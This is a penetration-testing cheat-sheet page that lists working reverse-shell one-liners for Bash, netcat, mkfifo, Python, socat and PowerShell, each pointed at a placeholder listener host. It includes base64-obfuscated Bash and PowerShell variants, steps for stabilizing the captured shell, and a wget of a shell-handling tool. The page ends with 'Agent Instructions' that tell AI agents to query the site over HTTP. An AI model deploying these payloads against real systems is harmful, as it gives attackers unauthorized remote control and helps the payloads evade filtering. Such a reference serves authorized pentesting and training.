# Reverse Shells

## Reverse Shells

### Online Reverse Shell Generator

{% embed url="<https://www.revshells.com/>" %}

### Bash

{% tabs %}
{% tab title="Bash" %}
{% code overflow="wrap" %}

```bash
bash -i >& /dev/tcp/<listener_ip>/<listener_port> 0>&1
```

{% endcode %}

{% hint style="info" %}
It is recommended to encapsulate the command in a `bash -c ''` to prevent issues with the ***/dev/tcp*** bash functionality.
{% endhint %}
{% endtab %}

{% tab title="Base64" %}
We can encode the content in **base64**, to avoid conflicts with symbols and spaces in the URL. Additionally, to prevent any *"+"* characters from appearing, we can use double encoding.

Generate the payload:

{% code overflow="wrap" %}

```bash
echo "bash -i >& /dev/tcp/<listener_ip>/<listener_port> 0>&1" | base64 | base64 | xargs -I{} echo "echo {}|base64 -d|base64 -d|bash"
```

{% endcode %}
{% endtab %}
{% endtabs %}

### Netcat

```bash
nc -e /bin/bash <listener_ip> <listener_port>
```

### Mkfifo

```bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <listener_ip> <listener_port> >/tmp/f
```

### Python

{% code overflow="wrap" %}

```bash
python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('<listener_ip>',<listener_port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn('bash')"
```

{% endcode %}

### Socat

```bash
socat tcp-connect:<listener_ip>:<listener_port> exec:/bin/bash,pty,stderr,setsid,sigint,sane
```

### PowerShell

{% tabs %}
{% tab title="Base64" %}
Generate the payload:

{% code overflow="wrap" %}

```bash
echo '$client = New-Object System.Net.Sockets.TCPClient("<listener_ip>",<listener_port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv -t utf-16le | base64 -w 0 | xargs echo "powershell -e"
```

{% endcode %}
{% endtab %}
{% endtabs %}

## Interactive TTY

{% tabs %}
{% tab title="Script" %}

```bash
script -qc bash /dev/null
```

{% endtab %}

{% tab title="Python" %}

```bash
python -c 'import pty; pty.spawn("/bin/bash")'
```

{% endtab %}
{% endtabs %}

and then run:

```bash
# Press <Ctrl> + z
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty rows <rows> columns <cols>  # Check size in another window -> stty size
```

#### Automatic Shell Stabilization

This script sets up a handler and automatically stabilizes Linux reverse shells. And for Windows machines uses `rlwrap` to allow command history, CTRL + L to clear the screen and other functions, also preventing CTRL + C from killing the session

{% embed url="<https://github.com/NLXZ/pwnc/>" %}

```sh
# Add it to your PATH
wget https://raw.githubusercontent.com/NLXZ/pwnc/refs/heads/main/pwnc.sh -O ~/.local/bin/pwnc
chmod +x ~/.local/bin/pwnc
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://nlxz.gitbook.io/pwnbook/post-exloitation/reverse-shells.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.